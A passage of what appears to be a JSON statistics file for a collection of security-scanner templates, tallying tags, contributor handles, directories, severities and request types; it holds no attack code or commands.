nt":1},{"name":"ssl","count":1},{"name":"appveyor","count":1},{"name":"wix","count":1},{"name":"exacqvision","count":1},{"name":"nc2","count":1},{"name":"metinfo","count":1},{"name":"tensorflow","count":1},{"name":"postgres","count":1},{"name":"cherokee","count":1},{"name":"cve2000","count":1},{"name":"netgenie","count":1},{"name":"viewpoint","count":1},{"name":"beanshell","count":1},{"name":"myucms","count":1},{"name":"tensorboard","count":1},{"name":"setup","count":1},{"name":"instatus","count":1},{"name":"tor","count":1},{"name":"primetek","count":1},{"name":"nexusdb","count":1},{"name":"vsftpd","count":1},{"name":"interlib","count":1},{"name":"achecker","count":1},{"name":"seacms","count":1},{"name":"catfishcms","count":1},{"name":"playable","count":1},{"name":"nomad","count":1},{"name":"dropbox","count":1},{"name":"cobub","count":1},{"name":"visualstudio","count":1},{"name":"netlify","count":1},{"name":"pyramid","count":1},{"name":"postmark","count":1},{"name":"springframework","count":1},{"name":"cve2004","count":1},{"name":"minimouse","count":1},{"name":"k8s","count":1},{"name":"bitquery","count":1},{"name":"cve2002","count":1},{"name":"onelogin","count":1},{"name":"find","count":1},{"name":"rsyncd","count":1},{"name":"wp","count":1},{"name":"ioncube","count":1},{"name":"htmli","count":1},{"name":"tileserver","count":1},{"name":"harvardart","count":1},{"name":"moinmoin","count":1},{"name":"cerebro","count":1},{"name":"trane","count":1},{"name":"esmtp","count":1},{"name":"weiphp","count":1},{"name":"ruckus","count":1},{"name":"lg-nas","count":1},{"name":"elevation","count":1},{"name":"fontawesome","count":1},{"name":"viewlinc","count":1},{"name":"twitter","count":1},{"name":"optimizely","count":1},{"name":"geocode","count":1},{"name":"totaljs","count":1},{"name":"glances","count":1},{"name":"fastcgi","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"opensns","count":1},{"name":"eyou","count":1},{"name":"revslider","count":1},{"name":"mo
nitorr","count":1},{"name":"smartsheet","count":1},{"name":"ipvpn","count":1},{"name":"timeclock","count":1},{"name":"discourse","count":1},{"name":"couchbase","count":1},{"name":"mongo","count":1},{"name":"panasonic","count":1},{"name":"mara","count":1},{"name":"wmt","count":1},{"name":"clink-office","count":1},{"name":"redcap","count":1},{"name":"glowroot","count":1},{"name":"geolocation","count":1},{"name":"graphiql","count":1},{"name":"sidekiq","count":1},{"name":"pendo","count":1},{"name":"xmpp","count":1},{"name":"zookeeper","count":1},{"name":"burp","count":1},{"name":"ebird","count":1},{"name":"owasp","count":1},{"name":"okta","count":1},{"name":"kerio","count":1},{"name":"nordex","count":1},{"name":"csrf","count":1},{"name":"bingmaps","count":1},{"name":"api-manager","count":1},{"name":"optiLink","count":1},{"name":"circontrol","count":1},{"name":"charity","count":1},{"name":"oidc","count":1},{"name":"nsasg","count":1},{"name":"sophos","count":1},{"name":"socomec","count":1},{"name":"octobercms","count":1},{"name":"shopxo","count":1},{"name":"mantis","count":1},{"name":"avalanche","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"bible","count":1},{"name":"micro-user-service","count":1},{"name":"phabricator","count":1},{"name":"alibaba","count":1},{"name":"mautic","count":1},{"name":"gilacms","count":1},{"name":"ipstack","count":1},{"name":"rmi","count":1},{"name":"instagram","count":1},{"name":"etherpad","count":1},{"name":"drone","count":1},{"name":"ssltls","count":1},{"name":"nette","count":1},{"name":"phpshowtime","count":1},{"name":"zyxel","count":1},{"name":"cybrotech","count":1},{"name":"vanguard","count":1},{"name":"ilo4","count":1},{"name":"postmessage","count":1},{"name":"tugboat","count":1},{"name":"clockwork","count":1},{"name":"tectuus","count":1},{"name":"sceditor","count":1},{"name":"webmodule-ee","count":1},{"name":"fedora","count":1},{"name":"74cms","count":1},{"name":"krweb","count":1},{"name":"exponentcms","c
ount":1},{"name":"appweb","count":1},{"name":"vnc","count":1},{"name":"sarg","count":1},{"name":"servicenow","count":1},{"name":"portainer","count":1},{"name":"episerver","count":1},{"name":"visionhub","count":1},{"name":"lumis","count":1},{"name":"qvisdvr","count":1},{"name":"etherscan","count":1},{"name":"powercreator","count":1},{"name":"tpshop","count":1},{"name":"sentry","count":1},{"name":"huijietong","count":1},{"name":"realteo","count":1},{"name":"matrix","count":1},{"name":"flink","count":1},{"name":"arl","count":1},{"name":"rmc","count":1},{"name":"emby","count":1},{"name":"billquick","count":1},{"name":"weglot","count":1},{"name":"lutron","count":1},{"name":"yzmcms","count":1},{"name":"iucn","count":1},{"name":"photo","count":1},{"name":"omi","count":1},{"name":"phpfusion","count":1},{"name":"pacsone","count":1},{"name":"wavemaker","count":1},{"name":"europeana","count":1},{"name":"hrsale","count":1},{"name":"selea","count":1},{"name":"placeos","count":1},{"name":"razor","count":1},{"name":"shoretel","count":1},{"name":"planon","count":1},{"name":"sangfor","count":1},{"name":"webctrl","count":1},{"name":"cgi","count":1},{"name":"alquist","count":1},{"name":"wavlink","count":1},{"name":"spectracom","count":1},{"name":"salesforce","count":1},{"name":"dotnetnuke","count":1},{"name":"grails","count":1},{"name":"wildfly","count":1},{"name":"clansphere","count":1},{"name":"rubedo","count":1},{"name":"embedthis","count":1},{"name":"cockpit","count":1},{"name":"trilithic","count":1},{"name":"panabit","count":1},{"name":"announcekit","count":1},{"name":"petfinder","count":1},{"name":"kodi","count":1},{"name":"sqlite","count":1},{"name":"webftp","count":1},{"name":"centreon","count":1},{"name":"apiman","count":1},{"name":"soar","count":1},{"name":"hiboss","count":1},{"name":"newrelic","count":1},{"name":"nweb2fax","count":1},{"name":"spf","count":1},{"name":"aura","count":1},{"name":"fortigate","count":1},{"name":"myvuehelp","count":1},{"name":"pivotaltracker","cou
nt":1},{"name":"lotuscms","count":1},{"name":"beanstalk","count":1},{"name":"redhat","count":1},{"name":"keenetic","count":1},{"name":"emc","count":1},{"name":"geddy","count":1},{"name":"xmlchart","count":1},{"name":"dvwa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"gurock","count":1},{"name":"piluscart","count":1},{"name":"uwsgi","count":1},{"name":"mailgun","count":1},{"name":"hubspot","count":1},{"name":"miscrsoft","count":1},{"name":"openstack","count":1},{"name":"extractor","count":1},{"name":"adfs","count":1},{"name":"gateone","count":1},{"name":"cocoon","count":1},{"name":"idor","count":1},{"name":"axiom","count":1},{"name":"messaging","count":1},{"name":"taiga","count":1},{"name":"karel","count":1},{"name":"acontent","count":1},{"name":"smartblog","count":1},{"name":"totolink","count":1},{"name":"commvault","count":1},{"name":"goahead","count":1},{"name":"jenzabar","count":1},{"name":"zm","count":1},{"name":"addpac","count":1},{"name":"swagger","count":1},{"name":"bhagavadgita","count":1},{"name":"cwp","count":1},{"name":" 
default-login","count":1},{"name":"darkstat","count":1},{"name":"jitsi","count":1},{"name":"fcm","count":1},{"name":"mojoauth","count":1},{"name":"nuxeo","count":1},{"name":"dbt","count":1},{"name":"spidercontrol","count":1},{"name":"elfinder","count":1},{"name":"trello","count":1},{"name":"haproxy","count":1},{"name":"discord","count":1},{"name":"pippoint","count":1},{"name":"tinypng","count":1},{"name":"xunchi","count":1},{"name":"daybyday","count":1},{"name":"netrc","count":1},{"name":"gotmls","count":1},{"name":"vscode","count":1},{"name":"pcoip","count":1},{"name":"cvnd","count":1},{"name":"tjws","count":1},{"name":"magicflow","count":1},{"name":"wooyun","count":1},{"name":"square","count":1},{"name":"calendarific","count":1},{"name":"landrayoa","count":1},{"name":"maccmsv10","count":1},{"name":"cyberoam","count":1},{"name":"gstorage","count":1},{"name":"youtube","count":1},{"name":"wamp","count":1},{"name":"h3c-imc","count":1},{"name":"fortiweb","count":1},{"name":"jsp","count":1},{"name":"iconfinder","count":1},{"name":"concrete","count":1},{"name":"opencast","count":1},{"name":"majordomo2","count":1},{"name":"buildkite","count":1},{"name":"stytch","count":1},{"name":"eg","count":1},{"name":"twig","count":1},{"name":"hadoop","count":1},{"name":"ghost","count":1},{"name":"rujjie","count":1},{"name":"simplecrm","count":1},{"name":"dwsync","count":1},{"name":"cscart","count":1},{"name":"phpwiki","count":1},{"name":"dotnet","count":1},{"name":"auth","count":1},{"name":"openerp","count":1},{"name":"ecshop","count":1},{"name":"opm","count":1},{"name":"aspnuke","count":1},{"name":"kerbynet","count":1},{"name":"testrail","count":1},{"name":"klog","count":1},{"name":"zarafa","count":1},{"name":"travis","count":1},{"name":"cloudinary","count":1},{"name":"perl","count":1},{"name":"meraki","count":1},{"name":"xampp","count":1},{"name":"webmin","count":1},{"name":"loqate","count":1},{"name":"tamronos","count":1},{"name":"fortilogger","count":1},{"name":"bookstack","count"
:1},{"name":"sage","count":1},{"name":"novnc","count":1},{"name":"dotclear","count":1},{"name":"eprints","count":1},{"name":"b2evolution","count":1},{"name":"bigbluebutton","count":1},{"name":"malshare","count":1},{"name":"jaspersoft","count":1},{"name":"syslog","count":1},{"name":"streetview","count":1},{"name":"acme","count":1},{"name":"dreamweaver","count":1},{"name":"eibiz","count":1},{"name":"jfrog","count":1},{"name":"qdpm","count":1},{"name":"iceflow","count":1},{"name":"idemia","count":1},{"name":"jquery","count":1},{"name":"adafruit","count":1},{"name":"camunda","count":1},{"name":"argocd","count":1},{"name":"ecom","count":1},{"name":"mdb","count":1},{"name":"zms","count":1},{"name":"cors","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"clave","count":1},{"name":"checkpoint","count":1},{"name":"meshcentral","count":1},{"name":"finereport","count":1},{"name":"jeewms","count":1},{"name":"javascript","count":1},{"name":"office365","count":1},{"name":"graylog","count":1},{"name":"restler","count":1},{"name":"ognl","count":1},{"name":"sourcebans","count":1},{"name":"codemeter","count":1},{"name":"acrolinx","count":1},{"name":"thedogapi","count":1},{"name":"ewebs","count":1},{"name":"kyan","count":1},{"name":"phpinfo","count":1},{"name":"basic-auth","count":1},{"name":"javafaces","count":1},{"name":"phppgadmin","count":1},{"name":"ncomputing","count":1},{"name":"distance","count":1},{"name":"ulterius","count":1},{"name":"apos","count":1},{"name":"edgemax","count":1},{"name":"fortigates","count":1},{"name":"argussurveillance","count":1},{"name":"dom","count":1},{"name":"wdja","count":1},{"name":"vidyo","count":1},{"name":"rabbitmq","count":1},{"name":"erp-nc","count":1},{"name":"floc","count":1},{"name":"dbeaver","count":1},{"name":"netdata","count":1},{"name":"orbintelligence","count":1},{"name":"listserv","count":1},{"name":"jenkin","count":1},{"name":"sonarcloud","count":1},{"name":"clockwatch","count":1},{"name":"seowon","count":1},
{"name":"geutebruck","count":1},{"name":"apigee","count":1},{"name":"weboftrust","count":1},{"name":"turbocrm","count":1},{"name":"etouch","count":1},{"name":"woocomernce","count":1},{"name":"loganalyzer","count":1},{"name":"webadmin","count":1},{"name":"sugarcrm","count":1},{"name":"paypal","count":1},{"name":"clearbit","count":1},{"name":"sast","count":1},{"name":"tenda","count":1},{"name":"sendgrid","count":1},{"name":"clickhouse","count":1},{"name":"labtech","count":1},{"name":"gridx","count":1},{"name":"parentlink","count":1},{"name":"openweather","count":1},{"name":"owa","count":1},{"name":"saltapi","count":1},{"name":"dahua","count":1},{"name":"webex","count":1},{"name":"samba","count":1},{"name":"szhe","count":1},{"name":"default","count":1},{"name":"acemanager","count":1},{"name":"route","count":1},{"name":"moin","count":1},{"name":"mkdocs","count":1},{"name":"bolt","count":1},{"name":"comodo","count":1},{"name":"anchorcms","count":1},{"name":"particle","count":1},{"name":"luftguitar","count":1},{"name":"nuuo","count":1},{"name":"cve202","count":1},{"name":"mailboxvalidator","count":1},{"name":"tongda","count":1},{"name":"mpsec","count":1},{"name":"artica","count":1},{"name":"pihole","count":1},{"name":"gerapy","count":1},{"name":"dvr","count":1},{"name":"virustotal","count":1},{"name":"ebook","count":1},{"name":"monitorix","count":1},{"name":"vercel","count":1},{"name":"shopware","count":1},{"name":"proftpd","count":1},{"name":"werkzeug","count":1},{"name":"aniapi","count":1},{"name":"xvr","count":1},{"name":"bazarr","count":1},{"name":"mrtg","count":1},{"name":"pagerduty","count":1},{"name":"netmask","count":1},{"name":"avtech","count":1},{"name":"plugin","count":1},{"name":"shiro","count":1},{"name":"faraday","count":1},{"name":"graphite","count":1},{"name":"yaws","count":1},{"name":"kubeflow","count":1},{"name":"acexy","count":1},{"name":"zzzcms","count":1},{"name":"kenesto","count":1},{"name":"tracer","count":1},{"name":"knowage","count":1},{"name":"ye
alink","count":1},{"name":"octoprint","count":1},{"name":"subrion","count":1},{"name":"nimble","count":1},{"name":"phpunit","count":1},{"name":"lancom","count":1},{"name":"cves2001","count":1},{"name":"cse","count":1},{"name":"kindeditor","count":1},{"name":"remkon","count":1},{"name":"eyelock","count":1},{"name":"database","count":1},{"name":"alertmanager","count":1},{"name":"fhem","count":1},{"name":"ueditor","count":1},{"name":"gunicorn","count":1},{"name":"facebook","count":1},{"name":"securityspy","count":1},{"name":"roads","count":1},{"name":"tinymce","count":1},{"name":"websvn","count":1},{"name":"alerta","count":1},{"name":"malwarebazaar","count":1},{"name":"urlscan","count":1},{"name":"timesheet","count":1},{"name":"clusterengine","count":1},{"name":"sco","count":1},{"name":"shoppable","count":1},{"name":"nedi","count":1},{"name":"diris","count":1},{"name":"qsan","count":1},{"name":"motorola","count":1},{"name":"wing-ftp","count":1},{"name":"mysql","count":1},{"name":"intercom","count":1},{"name":"commscope","count":1},{"name":"robomongo","count":1},{"name":"sterling","count":1},{"name":"dnn","count":1},{"name":"key","count":1},{"name":"ganglia","count":1},{"name":"hortonworks","count":1},{"name":"contentkeeper","count":1},{"name":"nearby","count":1},{"name":"blue-ocean","count":1},{"name":"details","count":1},{"name":"bing","count":1},{"name":"rdp","count":1},{"name":"gitbook","count":1},{"name":"jnoj","count":1},{"name":"plone","count":1},{"name":"gespage","count":1},{"name":"fuelcms","count":1},{"name":"kafdrop","count":1},{"name":"asus","count":1},{"name":"xdcms","count":1},{"name":"mongoshake","count":1},{"name":"crm","count":1},{"name":"books","count":1},{"name":"triconsole","count":1},{"name":"mediumish","count":1},{"name":"tplink","count":1},{"name":"limit","count":1},{"name":"codeigniter","count":1},{"name":"improvmx","count":1},{"name":"websphere","count":1},{"name":"opentsdb","count":1},{"name":"upnp","count":1},{"name":"hiawatha","count":1}],"au
thors":[{"name":"dhiyaneshdk","count":338},{"name":"daffainfo","count":333},{"name":"pikpikcu","count":286},{"name":"pdteam","count":216},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":156},{"name":"pussycat0x","count":90},{"name":"gy741","count":88},{"name":"0x_akoko","count":76},{"name":"princechaddha","count":72},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"gaurang","count":42},{"name":"philippedelteil","count":32},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"righettod","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"alph4byt3","count":9},{"name":"aashiq","count":8},{"name":"emadshanab","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":8},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"0x240x23elu","count":7},{"name":"rootxharsh","count":6},{"name":"__fazal","count":6},{"name":"johnk3r","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"iamnoooob","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"adam 
crosser","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"idealphase","count":5},{"name":"_0xf4n9x_","count":4},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"incogbyte","count":4},{"name":"forgedhallpass","count":4},{"name":"defr0ggy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"leovalcante","count":4},{"name":"impramodsargar","count":3},{"name":"github.com/its0x08","count":3},{"name":"johnjhacking","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":3},{"name":"dudez","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"jarijaas","count":3},{"name":"sullo","count":3},{"name":"me9187","count":3},{"name":"r3naissance","count":3},{"name":"emenalf","count":3},{"name":"lark-lab","count":3},{"name":"unstabl3","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"0w4ys","count":3},{"name":"andydoering","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"imnightmaree","count":3},{"name":"lotusdll","count":2},{"name":"foulenzer","count":2},{"name":"randomrobbie","count":2},{"name":"moritz nentwig","count":2},{"name":"davidmckennirey","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"zomsop82","count":2},{"name":"sy3omda","count":2},{"name":"0xelkomy","count":2},{"name":"socketz","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"x1m_martijn","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"k11h-de","count":2},{"name":"whoever","count":2},{"name":"cristi vlad 
(@cristivlad25)","count":2},{"name":"g4l1t0","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"martincodes-de","count":2},{"name":"udit_thakkur","count":2},{"name":"vavkamil","count":2},{"name":"arcc","count":2},{"name":"kiblyn11","count":2},{"name":"hetroublemakr","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"r12w4n","count":2},{"name":"gevakun","count":2},{"name":"huowuzhao","count":2},{"name":"pxmme1337","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"bp0lr","count":2},{"name":"joeldeleep","count":2},{"name":"bernardofsr","count":2},{"name":"random-robbie","count":2},{"name":"convisoappsec","count":2},{"name":"ffffffff0x","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"parth","count":2},{"name":"manas_harsh","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"w4cky_","count":2},{"name":"its0x08","count":2},{"name":"ehsahil","count":2},{"name":"dheerajmadhukar","count":2},{"name":"dahse89","count":2},{"name":"kareemse1im","count":1},{"name":"juicypotato1","count":1},{"name":"pudsec","count":1},{"name":"lethargynavigator","count":1},{"name":"thevillagehacker","count":1},{"name":"push4d","count":1},{"name":"xshuden","count":1},{"name":"remonsec","count":1},{"name":"daviey","count":1},{"name":"gboddin","count":1},{"name":"co0nan","count":1},{"name":"florianmaak","count":1},{"name":"aresx","count":1},{"name":"kre80r","count":1},{"name":"schniggie","count":1},{"name":"un-fmunozs","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"makyotox","count":1},{"name":"pratik 
khalane","count":1},{"name":"intx0x80","count":1},{"name":"wabafet","count":1},{"name":"nvn1729","count":1},{"name":"retr0","count":1},{"name":"geraldino2","count":1},{"name":"rojanrijal","count":1},{"name":"yuansec","count":1},{"name":"sbani","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mesaglio","count":1},{"name":"udyz","count":1},{"name":"regala_","count":1},{"name":"0h1in9e","count":1},{"name":"luci","count":1},{"name":"soyelmago","count":1},{"name":"knassar702","count":1},{"name":"nytr0gen","count":1},{"name":"jiheon-dev","count":1},{"name":"ofjaaah","count":1},{"name":"izn0u","count":1},{"name":"omarkurt","count":1},{"name":"toufik airane","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ohlinge","count":1},{"name":"streetofhackerr007","count":1},{"name":"andysvints","count":1},{"name":"shifacyclewla","count":1},{"name":"raesene","count":1},{"name":"j33n1k4","count":1},{"name":"affix","count":1},{"name":"fq_hsu","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"clarkvoss","count":1},{"name":"droberson","count":1},{"name":"2rs3c","count":1},{"name":"petruknisme","count":1},{"name":"infosecsanyam","count":1},{"name":"kabirsuda","count":1},{"name":"harshinsecurity","count":1},{"name":"nerrorsec","count":1},{"name":"skylark-lab","count":1},{"name":"alevsk","count":1},{"name":"ringo","count":1},{"name":"jeya seelan","count":1},{"name":"x6263","count":1},{"name":"noamrathaus","count":1},{"name":"ooooooo_q","count":1},{"name":"undefl0w","count":1},{"name":"0ut0fb4nd","count":1},{"name":"oscarintherocks","count":1},{"name":"taielab","count":1},{"name":"s1r1u5_","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"ivo palazzolo 
(@palaziv)","count":1},{"name":"berkdusunur","count":1},{"name":"zandros0","count":1},{"name":"ipanda","count":1},{"name":"ldionmarcil","count":1},{"name":"alperenkesk","count":1},{"name":"fopina","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"b4uh0lz","count":1},{"name":"furkansenan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"orpheus","count":1},{"name":"sec_hawk","count":1},{"name":"elder tao","count":1},{"name":"0xteles","count":1},{"name":"thezakman","count":1},{"name":"jrolf","count":1},{"name":"xstp","count":1},{"name":"fmunozs","count":1},{"name":"zhenwarx","count":1},{"name":"sickwell","count":1},{"name":"b0rn2r00t","count":1},{"name":"charanrayudu","count":1},{"name":"ajaysenr","count":1},{"name":"whynotke","count":1},{"name":"cookiehanhoan","count":1},{"name":"bolli95","count":1},{"name":"cckuailong","count":1},{"name":"coldfish","count":1},{"name":"mubassirpatel","count":1},{"name":"0xh7ml","count":1},{"name":"blckraven","count":1},{"name":"vzamanillo","count":1},{"name":"bad5ect0r","count":1},{"name":"lark lab","count":1},{"name":"yashanand155","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"shelld3v","count":1},{"name":"ilovebinbash","count":1},{"name":"hanlaomo","count":1},{"name":"_harleo","count":1},{"name":"deena","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"patralos","count":1},{"name":"akshansh","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"kurohost","count":1},{"name":"retr02332","count":1},{"name":"luskabol","count":1},{"name":"0xrod","count":1},{"name":"redteambrasil","count":1},{"name":"tirtha_mandal","count":1},{"name":"pdp","count":1},{"name":"notsoevilweasel","count":1},{"name":"philippdelteil","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro 
@am0nt31r0","count":1},{"name":"andirrahmani1","count":1},{"name":"b0yd","count":1},{"name":"chron0x","count":1},{"name":"iampritam","count":1},{"name":"ahmetpergamum","count":1},{"name":"_c0wb0y_","count":1},{"name":"_darrenmartyn","count":1},{"name":"igibanez","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"sshell","count":1},{"name":"akash.c","count":1},{"name":"notnotnotveg","count":1},{"name":"rodnt","count":1},{"name":"elmahdi","count":1},{"name":"majidmc2","count":1},{"name":"tim_koopmans","count":1},{"name":"shreyapohekar","count":1},{"name":"manuelbua","count":1},{"name":"hakluke","count":1},{"name":"mah3sec_","count":1},{"name":"yavolo","count":1},{"name":"smaranchand","count":1},{"name":"evolutionsec","count":1},{"name":"kaizensecurity","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"th3.d1p4k","count":1},{"name":"evan rubinstein","count":1},{"name":"flag007","count":1},{"name":"luqman","count":1},{"name":"husain","count":1},{"name":"alex","count":1},{"name":"becivells","count":1},{"name":"adrianmf","count":1},{"name":"apt-mirror","count":1},{"name":"d0rkerdevil","count":1},{"name":"zinminphy0","count":1},{"name":"borna 
nematzadeh","count":1},{"name":"willd96","count":1},{"name":"exploitation","count":1},{"name":"micha3lb3n","count":1},{"name":"c3l3si4n","count":1},{"name":"brabbit10","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"bjhulst","count":1},{"name":"mhdsamx","count":1},{"name":"52971","count":1},{"name":"0xd0ff9","count":1},{"name":"furkansayim","count":1},{"name":"elouhi","count":1},{"name":"sicksec","count":1}],"directory":[{"name":"cves","count":913},{"name":"vulnerabilities","count":347},{"name":"exposed-panels","count":318},{"name":"technologies","count":220},{"name":"exposures","count":196},{"name":"misconfiguration","count":163},{"name":"token-spray","count":127},{"name":"takeovers","count":65},{"name":"default-logins","count":63},{"name":"file","count":57},{"name":"workflows","count":44},{"name":"iot","count":36},{"name":"network","count":34},{"name":"miscellaneous","count":22},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":903},{"name":"high","count":691},{"name":"medium","count":516},{"name":"critical","count":322},{"name":"low","count":166}],"types":[{"name":"http","count":2477},{"name":"file","count":57},{"name":"network","count":47},{"name":"dns","count":12}]} 
+{"tags":[{"name":"cve","count":1168},{"name":"panel","count":517},{"name":"lfi","count":464},{"name":"xss","count":371},{"name":"wordpress","count":368},{"name":"rce","count":296},{"name":"exposure","count":294},{"name":"cve2021","count":289},{"name":"tech","count":272},{"name":"wp-plugin","count":268},{"name":"cve2020","count":197},{"name":"","count":189},{"name":"token-spray","count":155},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":122},{"name":"apache","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"unauth","count":111},{"name":"default-login","count":111},{"name":"iot","count":104},{"name":"oast","count":97},{"name":"login","count":85},{"name":"redirect","count":73},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"cve2022","count":68},{"name":"misconfig","count":68},{"name":"cve2017","count":64},{"name":"ssrf","count":62},{"name":"sqli","count":62},{"name":"file","count":60},{"name":"wp","count":59},{"name":"router","count":58},{"name":"network","count":53},{"name":"oracle","count":51},{"name":"disclosure","count":46},{"name":"cve2016","count":45},{"name":"auth-bypass","count":42},{"name":"plugin","count":40},{"name":"authenticated","count":38},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"cisco","count":35},{"name":"injection","count":33},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"devops","count":29},{"name":"traversal","count":29},{"name":"generic","count":27},{"name":"kubernetes","count":26},{"name":"cms","count":25},{"name":"oss","count":25},{"name":"springboot","count":24},{"name":"adobe","count":24},{"name":"cnvd","count":23},{"name":"proxy","count":22},{"name":"sap","count":22},{"name":"intrusive","count":22},{"name":"vmware","count":21},{"name":"microsoft","count":21},{"name":"misc","count":21},{"name":"debug","count":21},{"na
me":"aem","count":21},{"name":"service","count":20},{"name":"wp-theme","count":20},{"name":"fuzz","count":20},{"name":"manageengine","count":19},{"name":"dns","count":19},{"name":"cve2012","count":19},{"name":"php","count":18},{"name":"deserialization","count":18},{"name":"zoho","count":18},{"name":"weblogic","count":17},{"name":"tomcat","count":17},{"name":"k8s","count":17},{"name":"aws","count":17},{"name":"ibm","count":16},{"name":"dlink","count":16},{"name":"struts","count":16},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"fileupload","count":15},{"name":"cve2011","count":15},{"name":"java","count":14},{"name":"cve2009","count":14},{"name":"hp","count":14},{"name":"api","count":14},{"name":"xxe","count":14},{"name":"android","count":14},{"name":"camera","count":13},{"name":"ruijie","count":13},{"name":"firewall","count":13},{"name":"nginx","count":12},{"name":"status","count":12},{"name":"printer","count":12},{"name":"netsweeper","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"rails","count":12},{"name":"lfr","count":12},{"name":"netgear","count":11},{"name":"magento","count":11},{"name":"graphql","count":11},{"name":"cnvd2021","count":11},{"name":"upload","count":10},{"name":"dell","count":10},{"name":"airflow","count":10},{"name":"grafana","count":10},{"name":"spring","count":10},{"name":"fortigate","count":10},{"name":"coldfusion","count":10},{"name":"jolokia","count":10},{"name":"backup","count":10},{"name":"glpi","count":10},{"name":"cve2008","count":9},{"name":"iis","count":9},{"name":"laravel","count":9},{"name":"wso2","count":9},{"name":"fastjson","count":9},{"name":"woocommerce","count":9},{"name":"drupal","count":9},{"name":"auth","count":9},{"name":"zabbix","count":9},{"name":"mirai","count":9},{"name":"windows","count":9},{"name":"webserver","count":9},{"name":"fortinet","count":9},{"name":"jndi","count":9},{"name":"ftp","count":9},{"name":"github","count":9},{"name":"azure","count":8},{"name":"aud
